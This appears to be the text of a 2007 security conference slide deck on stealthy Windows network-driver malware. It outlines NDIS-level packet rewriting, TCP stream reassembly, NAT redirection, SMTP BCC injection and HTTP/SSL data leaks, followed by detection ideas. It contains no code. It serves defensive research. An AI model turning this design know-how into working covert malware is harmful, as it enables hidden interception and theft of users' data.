TCP/IP Perversion Rares Stefan, Third Brigade Inc. SecTor 2007 1 Introduction Perspective from a researcher focused on protecting hosts from malware Implementing kernel-based protection mechanisms Insight into a potential class of network driver malware 2 The Rise of Silent Malware Three main areas of interest in malware R&D: Delivery and activation Hiding presence - rootkit techniques Evasion - Minimize operating noise Show no signs of activity on the infected system Show no traces of network activity on the wire 3 Operational Challenges Operate on wire data Active at a layer that guarantees transparency to the host Correctly perform inline IP reassembly and TCP stream reassembly Allow for arbitrary injection/removal of data in TCP sessions 4 Operational Challenges…part deux Maintain silence on the host: Never initiate TCP sessions Never receive TCP open-session requests Do not rely on TCP port splicing if the infected host is a server Do not rely on static motherships if the infected host is a workstation Packet modifications should not be easily visible in local network traces 5 Operational Challenges…part trois Maintain silence on the wire Only make use of legitimate TCP sessions Do not alter protocol semantics - resistance to network anomaly detection engines Piggyback on encrypted channels (SSL) and multiple TCP sessions for large data transfers 6 Driver Implementation Pre-Vista User Land Never Access to data stream, not packets Some interesting areas No guaranteed access to outbound payload TDI FW hook PF hook TCP/IP NDIS NDIS.SYS Intermediate driver Miniport driver NDIS hooking - Some delivery challenges - Most flexibility - Driver signing issues - Complete control over hardware drivers to transport protocol communications 7 Rogue Network Driver Framework Firewall hook kernel module for basic packet header operations IM Filter driver: Inline IP reassembly Inline TCP stream reassembly TCP session normalization 8 Packet Header Modifications 9 Infected Workstation SNAT/DNAT – SrcIP_Alice -> SrcIP_Bob DstIP_Bob -> dstIP_server BOB https://server ALICE DNAT – DstIP_server -> DstIP_Bob 10.0.1.26 10.0.1.124 server Translated request reaches server 10 Infected Workstation SNAT/DNAT – SrcIP_Alice -> SrcIP_Bob DstIP_Bob -> dstIP_server BOB https://server ALICE DNAT – DstIP_server -> DstIP_Bob 10.0.1.26 10.0.1.124 server Translated request reaches server 11 Infected Server Selective DN(P)AT: ALICE SrcIP_Alice SrcIP_server Dst_Port_443 DstPort_135 telnet server:80 Server https://server https request served 12 Infected Server Selective DN(P)AT: ALICE SrcIP_Alice SrcIP_server Dst_Port_443 DstPort_135 telnet server:80 Server https://server https request served 13 Packet Header Opportunities Passive covert channels http://www.invisiblethings.org/papers/passive-covert-channels-linux.pdf http://www.ouah.org/neural_networks_vs_NUSHU.pdf http://staff.science.uva.nl/~delaat/snb-2005-2006/p27/report.pdf Port splicing Most significant; communicating the original intent: DNAT on outgoing SYN – change destination address to that of the MIM Insert original dstIP in header fields MIM double NAT 14 Why Payload Injection ? Access to packet data High bandwidth channel Bypass application proxies Altering TCP data length on the wire is not trivial! 15 Inline Injection Support for IP reassembly on incoming traffic and IP fragmentation on outbound traffic Support for TCP stream reassembly – datagram reordering, injection of acknowledgements and resets, among other things 16 Inline TCP Reassembly Maintain two edges (pre and post modification): ISN MaxSeq MaxAck Window Maximum SeqNo of Filtered Data Maximum AckNo of Filtered Data Queue/counter for non Ack-ed datagrams Queue/counter for not sent datagrams Needed Window Scale Actual Window Scale 17 SMTP Injection – Eliminating Bob from the Equation Reduces the complexity of MIM and random redirection Works with application level proxies Replace RCPT TO argument or inject additional RCPT TO (BCC) Increases the probability detection – SMTP server logs 18 SMTP Injection BOB Alice Sends Bob message Driver injects BCC to Eva SMTP Server Bob receives original message Eva So does Eva 19 SMTP Injection Demo Vid1 20 21 22 HTTP Injection TCP Headers useless – need to find workaround Easy workaround but we need to be careful: Transparent proxies (Initial HTTP request looks normal, so we’ll always assume we may be transparently “proxied”) Direct proxies – easy to spot in HTTP(s) requests URI & Headers will help us redirect/leak data Make use of Authorization, Cookies headers – they won’t be scrubbed POST data also presents injection opportunities 23 HTTP Injection google.com BOB Web Proxy – Content Filtering Change request; Inject Data http://www.google.com ALICE 24 HTTP Injection google.com BOB Web Proxy – Content Filtering Change request; Inject Data http://www.google.com ALICE 25 SSL Injection Demo somebank.com BOB Perimeter Security Inject Data https://somebank.com ALICE 26 SSL Injection Demo somebank.com BOB Perimeter Security Inject Data https://somebank.com ALICE 27 SSL Alice – browser video 28 Detecting Network Driver Malware Conventional detection mechanisms AV, AS signatures; configuration mgmt New detection mechanisms Traffic based detection? Malicious destinations, ISN analysis Network trace diff – local vs. remote NDIS based sniffer for better visibility? Other Host based application control ineffective DLP? … 29 Conclusions Passive kernel malware difficult to spot There are significant implementation challenges for coders Prevention remains key approach 30 Thank You 31 Infected Workstation 32 Alice – Browser Capture 33 Alice-Bob Network Traces 34 Alice Driver_SNAT 35 Alice_SNAT 36 Back to Infected Workstation 37 Bob_Double_NAT 38 Bob_Double_NAT 39 Bob_Double_NAT 40 Bob_Double_NAT 41 Back to Infected Workstation 42 Infected Server 43 Server network trace 44 Server SNAT&DPAT 45 Back to Infected Server 46 HTTP Injection 47 Alice – browser video 48 Alice – network trace 49 Alice - original data 50 Alice – driver work 51 Alice – driver work 52 Alice – driver work 53 Alice – driver work 54 Back to HTTP Injection 55 Bob – driver work 56 Bob – modified request 57 Bob – driver work 58 Bob – driver work 59 Back to HTTP Injection 60 SSL Injection 61 Alice – original data 62 Post Insert – Wire Noise! 63 Alice – SSL clean 64 Back to SSL Injection 65 Bob – Post modification. Clean!! 66 Back to SSL Injection 67
© Copyright 2026 Paperzz